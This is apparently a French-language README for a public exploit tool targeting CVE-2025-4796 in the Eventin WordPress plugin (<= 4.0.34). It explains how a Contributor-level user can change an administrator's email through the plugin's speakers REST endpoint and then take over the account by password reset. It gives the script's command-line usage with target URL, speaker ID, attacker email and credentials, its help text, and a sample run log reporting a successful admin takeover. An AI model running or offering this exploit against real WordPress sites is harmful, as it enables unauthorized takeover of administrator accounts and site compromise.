
Eventin <= 4.0.34 - Élévation de privilèges (Contributeur+) authentifiée via changement d'e-mail utilisateur / prise de contrôle du compte
Eventin <= 4.0.34 - Élévation de privilèges authentifiée (Contributeur+) via le changement d'e-mail utilisateur / prise de contrôle de compte
Ce dépôt documente une vulnérabilité d'élévation de privilèges dans le plugin WordPress Eventin (<= 4.0.34) qui permet à un utilisateur authentifié disposant des capacités Contributeur+ de modifier les adresses e-mail d'utilisateurs arbitraires via l'API de mise à jour des intervenants du plugin. En modifiant l'e-mail d'un administrateur, un attaquant peut déclencher une réinitialisation de mot de passe et prendre le contrôle du compte.
Composant vulnérable : plugin WordPress Eventin (Eventin\Speaker\Api\SpeakerController::update_item)
Versions affectées : <= 4.0.34
CVE : CVE-2025-4796
CVSS : 8.8 (High)
Installations actives : 10,000+
Eventin ne valide pas correctement l'identité ou les capacités de l'appelant avant de mettre à jour les détails de l'intervenant/utilisateur (en particulier l'e-mail). Un attaquant authentifié en tant que contributeur (ou plus) peut modifier l'adresse e-mail d'autres utilisateurs — y compris les administrateurs — via le point de terminaison REST du plugin :
Une fois l'e-mail changé vers une adresse contrôlée par l'attaquant, le flux standard de réinitialisation de mot de passe de WordPress peut être utilisé pour prendre le contrôle du compte.
Nom du fichier : CVE-2025-4796.py
Ce script automatise les étapes suivantes :
/wp-json/eventin/v2/speakers/<speaker_id> pour mettre à jour l'e-mail de l'intervenant.Prérequis :
Installation :
pip install requests
Exécutez le script depuis la ligne de commande :
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
Affichez l'aide du script :
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
Par : Khaled Alenaz (Nxploited)
GitHub : https://github.com/Nxploited/